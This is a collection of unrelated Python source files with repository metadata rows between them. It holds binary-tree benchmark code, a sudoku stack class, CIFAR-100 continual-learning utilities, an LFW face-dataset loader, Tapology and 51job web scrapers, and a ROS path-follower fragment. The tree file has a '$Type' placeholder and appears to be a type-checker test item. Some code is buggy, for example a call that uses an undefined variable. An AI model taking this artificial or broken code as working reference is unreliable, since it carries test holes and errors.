left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: $Type, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
02e18c7b8a4c3ab41fd01dd0fb8e3fd20ee6d3f1 | 9949376205f2617d60fb49ad948da79e7bb1ec87 | /clas.py | 3e718e73d3cc4e7aa39604d259e0a42e343fc15d | [] | no_license | Creeper315/Suduko-Solver | 5dbff7432aa418c26dba4891ca8426984a6081b4 | ca05e3d03b47d3a93e279ac95cda9dfc26a25838 | refs/heads/main | 2023-02-24T10:00:43.382702 | 2021-01-27T04:40:01 | 2021-01-27T04:40:01 | 333,304,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import numpy as np
class Stack:
def __init__(self):
self.value = np.ndarray([0,2], dtype=int) # Note: If dtype is not "int", later when we use these number as index, we might return float, but only integers can be index.
#self.value = np.zeros([0, 2])
def add(self, position):
self.value = np.concatenate((self.value, np.array([position])), axis=0)
def pop(self):
r = self.value[-1]
self.value = self.value[0:-1]
return r
def current(self):
return self.value[-1]
def length(self):
return len(self.value)
def contain(self, position):
for i in self.value:
if position[0] == i[0] and position[1] == i[1]:
return True
return False
if __name__ == '__main__':
'''s = Stack()
print(s.value)
s.add([1,2])
s.add([4,5])
s.add([9,10])
print(s.value)
print(s.value[0])
print(s.value)
print(s.contain([3,5]))
print(s.current()[0])'''
| [
"noreply@github.com"
] | noreply@github.com |
385e7002048051f5d77a795985a595ead6f1bcb0 | 221c5a5769e84e5ba99320fd2db17152c6354919 | /py_basics_problems/reverse_sentense_s1.py | f401070558b7751a458d4b8d043db26991c70351 | [] | no_license | saradaprasad/py | 9727e7cf8c1fb1a6aef665bfde9483a212224776 | d5ad5a80de43c9ee0a73d870d468151275123ee2 | refs/heads/main | 2023-07-07T16:33:22.949182 | 2021-08-11T14:51:45 | 2021-08-11T14:51:45 | 380,809,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | def reversed_words():
sentence='Python is exciting!'
words=sentence.split(' ');
reverse_sentence=' '.join(reversed(words))
print(reverse_sentence)
reversed_words() | [
"prasadsarada7@gmail.com"
] | prasadsarada7@gmail.com |
b478bc94e0a6fd66283bbc040deba2068d2a0e0d | 0c78aaaaad898d8076d30b0c6a3178ba49e7e833 | /utils.py | e50ce33c70253b2058b91ba2f05cd685594f313b | [
"MIT"
] | permissive | orgilj/cifar_continual_learning | d94a1da634e32627acc86b77009fb2d23d8dd88d | 4bbdbb38dbf3a2c85edbc08d59d1ef1fe90b7037 | refs/heads/main | 2023-02-23T13:38:41.472750 | 2021-01-29T15:24:02 | 2021-01-29T15:24:02 | 334,178,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,693 | py | import numpy as np
import torch
import torchvision
from tqdm import tqdm
def get_split_cifar100(task_id, start_class=None, end_class=None, batch_size=32, shuffle=False):
# convention: tasks starts from 1 not 0 !
# task_id = 1 (i.e., first task) => start_class = 0, end_class = 4
if start_class is None:
start_class = (task_id - 1) * 5
end_class = task_id * 5
CIFAR100_TRAIN_MEAN = (0.5070751592371323, 0.48654887331495095, 0.4409178433670343)
CIFAR100_TRAIN_STD = (0.2673342858792401, 0.2564384629170883, 0.27615047132568404)
transforms = torchvision.transforms.Compose([
torchvision.transforms.RandomCrop(32, padding=4),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.RandomRotation(15),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD),
])
train = torchvision.datasets.CIFAR100('./data/', train=True, download=True, transform=transforms)
test = torchvision.datasets.CIFAR100('./data/', train=False, download=True, transform=transforms)
# train_size = int(0.8 * len(train))
# val_size = len(train) - train_size
# train, val = torch.utils.data.random_split(train, [train_size, val_size])
# print(len(train), len(val))
targets_train = torch.tensor(train.targets)
target_train_idx = ((targets_train >= start_class) & (targets_train < end_class))
# targets_val = torch.tensor(val.targets)
# target_val_idx = ((targets_val >= start_class) & (targets_val < end_class))
targets_test = torch.tensor(test.targets)
target_test_idx = ((targets_test >= start_class) & (targets_test < end_class))
train_loader = torch.utils.data.DataLoader(
torch.utils.data.dataset.Subset(train, np.where(target_train_idx == 1)[0]), batch_size=batch_size)
# val_loader = torch.utils.data.DataLoader(
# torch.utils.data.dataset.Subset(val, np.where(target_val_idx == 1)[0]), batch_size=batch_size)
test_loader = torch.utils.data.DataLoader(torch.utils.data.dataset.Subset(test, np.where(target_test_idx == 1)[0]),
batch_size=batch_size // 2)
return train_loader, test_loader
def train(model, train_loader, test_loader, train_scheduler, optimizer, loss_fn, mask, opt):
for epoch in range(opt.train_epochs):
model.train()
correct = 0.0
total = 0.0
pbar = tqdm(train_loader)
for image, target in pbar:
image, target = image.to(opt.device), target.to(opt.device)
optimizer.zero_grad()
output = model(image)
loss = loss_fn(output, target)
loss.backward()
if torch.is_tensor(mask):
with torch.no_grad():
model.fc.weight.grad[mask] = 0.0
optimizer.step()
_, preds = output.max(1)
correct += preds.eq(target).sum()
total += target.shape[0]
pbar.set_description(
'Epoch: %s, Train accuracy: %f, Loss: %f' % (str(epoch), (correct / total).item(), loss.item()))
pbar.close()
if epoch % opt.test_freq == 0:
test(model, test_loader, opt)
train_scheduler.step()
def test(model, test_loader, opt):
model.eval()
correct = 0.0
total = 0.0
pbar = tqdm(test_loader)
for image, target in pbar:
image, target = image.to(opt.device), target.to(opt.device)
output = model(image)
_, preds = output.max(1)
correct += preds.eq(target).sum()
total += target.shape[0]
accuracy = (correct / total).item()
pbar.set_description('Test accuracy: %f' % accuracy)
pbar.close()
return (correct / total).item()
def update_mask(model, opt, old_mask=None):
model.cpu()
if not torch.is_tensor(old_mask):
with torch.no_grad():
new = model.fc.weight.cpu().numpy()
print(torch.histc(model.fc.weight.data, bins=20, min=-1.0, max=1.0))
mask = (new <= (new.max() - opt.zero_threshold)) & (new >= (new.min() + opt.zero_threshold / 3))
print('New mask thresholding range: [', new.min() + opt.zero_threshold / 3, ',',
new.max() - opt.zero_threshold, '], Number of weights released:', mask.sum())
new[mask] = 0.0
model.fc.weight.data = torch.tensor(new)
else:
h, w = old_mask.shape
with torch.no_grad():
new = model.fc.weight.cpu()
new_task_weight = new[h:, w:]
old_task_weight = new[:h, :w]
old_task_trainable = old_task_weight[old_mask]
# TODO update old mask
# TODO update new task
return model.to(opt.device), mask
def add_task(model, task_id, opt):
model.cpu()
with torch.no_grad():
old_weights, old_bias = model.fc.weight.data, model.fc.bias.data
model.fc = torch.nn.Linear(model.fc.in_features, task_id * 5)
model.fc.weight.data[:(task_id - 1) * 5, :], model.fc.bias.data[:(task_id - 1) * 5] = old_weights, old_bias
# after add task you should train until test threshold accuracy
model.to(opt.device)
return model
def train_calib(model_calib, train_loader, test_loader, optimizer, loss_fn, opt):
model_calib.to(opt.device)
target_calib = torch.autograd.Variable(torch.tensor([1.0]), requires_grad=True).to(opt.device)
for i in range(10):
pred_model_accuracy = test(model, test_loader, opt)
loss = loss_fn(pred_model_accuracy, target_calib)
print('loss: ', loss.item())
loss.backward()
optimizer.step()
| [
"toorgil2012@gmail.com"
] | toorgil2012@gmail.com |
555fdd00b37a194a38488f565a9af20e5d192fb0 | 32209739eaf5b0e5ae245174bc7ca887f3a0e110 | /Introduction to Deep Learning-Week4/lfw_dataset.py | 40eb0933bdf7932d6c293ba8ef6688a461768b28 | [] | no_license | YellowcardD/Introduction-to-Deep-Learning | 43f74c8ae68e72716884428d8a6ce1928333e489 | 3efe971a7b11702407693f03d24ce7c592a9e03a | refs/heads/master | 2020-04-07T05:05:21.190798 | 2018-11-18T16:13:58 | 2018-11-18T16:13:58 | 158,082,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,889 | py | import numpy as np
import os
import cv2
import pandas as pd
import tarfile
import tqdm
ATTRS_NAME = "lfw_attributes.txt"
IMAGE_NAME = "lfw-deepfunneled.gz"
RAW_IMAGES_NAME = "lfw.gz"
def decode_iamge_from_raw_bytes(raw_bytes):
img = cv2.imdecode(np.asarray(bytearray(raw_bytes), dtype=np.uint8), 1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
def load_lfw_dataset(use_raw=False, dx=80, dy=80, dimx=45, dimy=45):
# read attrs
df_attrs = pd.read_csv(ATTRS_NAME, sep='\t', skiprows=1)
df_attrs = pd.DataFrame(df_attrs.iloc[:, :-1].values, columns=df_attrs.columns[1:])
imgs_with_attrs = set(map(tuple, df_attrs[["person", "imagenum"]].values))
# read photos
all_photos = []
photo_ids = []
with tarfile.open(RAW_IMAGES_NAME if use_raw else IMAGE_NAME) as f:
for m in tqdm.tqdm(f.getmembers()):
if m.isfile() and m.name.endswith(".jpg"):
# prepare image
img = decode_iamge_from_raw_bytes(f.extractfile(m).read())
img = img[dy:-dy, dx:-dx]
img = cv2.resize(img, (dimx, dimy))
# parse person
fname = os.path.split(m.name)[-1]
fname_splitted = fname[:-4].replace('_', ' ').split()
person_id = ' '.join(fname_splitted[:-1])
photo_number = int(fname_splitted[-1])
if (person_id, photo_number) in imgs_with_attrs:
all_photos.append(img)
photo_ids.append({'person': person_id, 'imagenum':photo_number})
photo_ids = pd.DataFrame(photo_ids)
all_photos = np.stack(all_photos).astype('uint8')
# perserve photo_ids order!
all_attrs = photo_ids.merge(df_attrs, on=('person', 'imagenum')).drop(['person', 'imagenum'], axis=1)
return all_photos, all_attrs | [
"noreply@github.com"
] | noreply@github.com |
54a8308182a451fb04d18b813d5defda147a66a0 | 79d7c2ea9133a057bce82c6286013da9752ae5c0 | /Code/Data_Gathering/TapologyFighterScraper.py | 2aa108b31917d1765aee1d9104d8ed0db183083d | [
"MIT"
] | permissive | MrForExample/Weighted-UFC-Fight-Predictor | 6ad9280743a00ce5b3ca7d8e41697b060bb9d3ca | bd5744bfb8fcab4d054a7e038ccc3e854c5fd4fa | refs/heads/main | 2023-01-14T08:08:40.213170 | 2020-11-12T14:39:38 | 2020-11-12T14:39:38 | 312,268,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | import scrapy
import pandas as pd
self_df = pd.read_csv("../FighterRawData.csv", index_col=0)
miss_fighters_name = self_df[self_df.values == '--'].drop_duplicates(subset=['FIGHTER'])['FIGHTER'].values.tolist()
# Can't scrape all at once due to site spider restriction strategy
miss_fighters_name = miss_fighters_name[1500:]
start_url = "https://www.tapology.com/search?term="
#start_url = "https://www.tapology.com/search?term=Papy+Abedi"
fighter_data_columns = ['FIGHTER', 'HEIGHT', 'WEIGHT', 'REACH', 'STANCE', 'DOB']
all_fighter_df = pd.DataFrame(columns=fighter_data_columns)
class TapologyFighterSpider(scrapy.Spider):
name = 'tapology_fighter_spider'
all_fighter_data = []
custom_settings = {
'CONCURRENT_REQUESTS': '1',
'DOWNLOAD_DELAY': 1
}
def start_requests(self):
url_fighters_name = []
print(miss_fighters_name)
print(len(miss_fighters_name))
for name in miss_fighters_name:
name_list = name.split(' ')
if '' in name_list:
name_list.remove('')
url_name = name_list[0]
for i in range(1, len(name_list)):
url_name += '+' + name_list[i]
url_fighters_name.append(url_name)
start_urls = [start_url + url_name for url_name in url_fighters_name]
#start_urls = [start_url]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'Accept': 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',
}
for url in start_urls:
yield scrapy.http.Request(url, headers=headers)
def parse(self, response):
fighter_name = response.url.split('=')[-1].split('+')
info_a_items = response.css("table.fcLeaderboard a")
for item in info_a_items:
fighter_name_on_site = item.xpath("text()").extract_first().strip().split(' ')
if all(n in fighter_name_on_site for n in fighter_name):
link = item.css("a::attr(href)").get()
if link != None and link.split('/')[-2] == 'fighters':
new_fighter_data = {}
new_fighter_data['FIGHTER'] = ' '.join(fighter_name)
self.all_fighter_data.append(new_fighter_data)
yield response.follow(link, callback=self.parse_fighter, cb_kwargs=dict(fighter_data=new_fighter_data))
def parse_fighter(self, response, fighter_data):
info_li_items = response.css("div.details_two_columns ul.clearfix li")
if len(info_li_items) > 0:
info_span_items = info_li_items[4].css("span::text").getall()
if len(info_span_items) > 0:
fighter_data['DOB'] = info_span_items[-1].strip()
info_span_items = info_li_items[6].css("span::text").getall()
if len(info_span_items) > 0:
fighter_data['WEIGHT'] = info_span_items[-1].strip()
info_span_items = info_li_items[8].css("span::text").getall()
if len(info_span_items) > 0:
fighter_data['HEIGHT'] = info_span_items[0].strip().split(' ')[0]
fighter_data['REACH'] = info_span_items[1].strip().split(' ')[0]
def closed(self, reason):
global all_fighter_df
for fighter_data in self.all_fighter_data:
#print(fighter_data)
all_fighter_df = all_fighter_df.append(fighter_data, ignore_index=True)
all_fighter_df.to_csv('../raw_fighter_details_1500-1784.csv')
| [
"62230687+MrForExample@users.noreply.github.com"
] | 62230687+MrForExample@users.noreply.github.com |
9330cd3f6095c574c0fa566a8d69be0fec19b834 | a62a87ad976e3d35ea7879671190faf950ebaf3b | /scrapys/t.py | 47ae7f7a675a471d9db25b8bb6a431b20fa33406 | [] | no_license | YangXiaoo/Django-web | 144c8c1800d2a67bf8d1d203210aa351d31e8fb3 | 97903f309234fd1421a19a52a083f214172d6c79 | refs/heads/master | 2020-03-24T11:29:20.296017 | 2019-01-20T14:54:16 | 2019-01-20T14:54:16 | 142,687,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | # -*- coding: utf-8 -*-
import re
import urllib2
import pandas as pd
#获取原码
def get_content(page):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
url ='http://search.51job.com/list/000000,000000,0000,00,9,99,python,2,'+ str(page)+'.html'
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
re= unicode(html, "gbk").encode("utf8")
return re
def get(html):
reg = re.compile(r'class="t1 ">.*? href="(.*?)".*? <a target="_blank" title="(.*?)".*? <span class="t2"><a target="_blank" title="(.*?)" href="(.*?)".*?<span class="t3">(.*?)</span>.*?<span class="t4">(.*?)</span>.*? <span class="t5">(.*?)</span>',re.S)
items=re.findall(reg,html)
return items
def info_get(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg = re.compile(r'<span class="sp4"><em class="(.*?)"></em>(.*?)</span>',re.S)
based_info = re.findall(reg,html)
reg_p = re.compile(r'<span class="el">(.*?)</span>',re.S)
kind = re.findall(reg_p,html)
return based_info,kind
def address(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg_a = re.compile(r'<div class="tBorderTop_box bmsg">.*?</span>(.*?)</p>',re.S)
address = re.findall(reg_a,html)
return address
final = []
for j in range(1,2):
print("正在爬取第"+str(j)+"页数据...")
try:
html=get_content(j)
for i in get(html):
result = {}
with open ('51job.txt','a') as f:
f.write(i[0]+'\t'+i[1]+'\t'+i[2]+'\t'+i[3]+'\t'+i[4]+'\t'+i[5]+'\t'+i[6]+'\n')
f.close()
result['info_link'] = i[0]
info,kind = info_get(i[0])
count = 1
for n in info:
if count == 1:
result['experience'] = n[1]
count += 1
elif count == 2:
result['educational'] = n[1]
count += 1
else:
break
result['work_type'] = kind[0]
result['address'] = address
result['name'] = i[1]
result['company'] = i[2]
result['company_link'] = i[3]
result['work_place'] = i[4]
result['salary'] = i[5]
ad = address(i[3])
result['address'] = ad
result['publish_time'] = i[6]
final.append(result)
except:
pass
df = pd.DataFrame(final)
df.to_csv('51job-data_analysis.csv', mode = 'a',encoding = 'utf8')
| [
"33798487+YangXiaoo@users.noreply.github.com"
] | 33798487+YangXiaoo@users.noreply.github.com |
2c8e692913201e7b86f4e54c67ce0c02757ef65d | 02880a53d16e3ede7c6a9f7d24949f04754dd2ca | /turtlebot_control/src/path_follow_cv.py | 02d09e70b192412ca4216ccccebdf5ad8f0a29d1 | [] | no_license | DodgeBot/ROS | ff33bc90aa28fbbff25fd2ccfba9ef9c082da01f | e714db21260d38fa04989bf8ab766de6428289ec | refs/heads/master | 2021-04-12T08:05:56.383947 | 2017-07-02T22:32:52 | 2017-07-02T22:32:52 | 94,515,113 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,542 | py | #!/usr/bin/python
import os
import sys
import csv
import cv2
import glob
import numpy as np
from ParticleFilter import ParticleFilter
import rospy
import roslib
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import imutils
import numpy as np
import time
G_LABEL_RIGHT = 0
G_LABEL_STRAIGHT = 1
G_LABEL_LEFT = 2
intercepts = []
class PathFollower:
def __init__(self):
self.image_pub = rospy.Publisher("path_follow_result_image", Image, queue_size=1)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("image_raw", Image, self.img_callback)
def img_callback(self, data):
xr_phase = 0
xl_phase = 0
try:
orig_img = self.bridge.imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
print(e)
(rows, cols, channels) = orig_img.shape
# cv_image = imutils.resize(orig_img, width=min(400, cols))
xl_int_pf=ParticleFilter(N=1000,x_range=(0,1500),sensor_err=1,par_std=100)
xl_phs_pf=ParticleFilter(N=1000,x_range=(15,90),sensor_err=0.3,par_std=1)
xr_int_pf=ParticleFilter(N=1000,x_range=(100,1800),sensor_err=1,par_std=100)
xr_phs_pf=ParticleFilter(N=1000,x_range=(15,90),sensor_err=0.3,par_std=1)
#tracking queues
xl_int_q = [0]*15
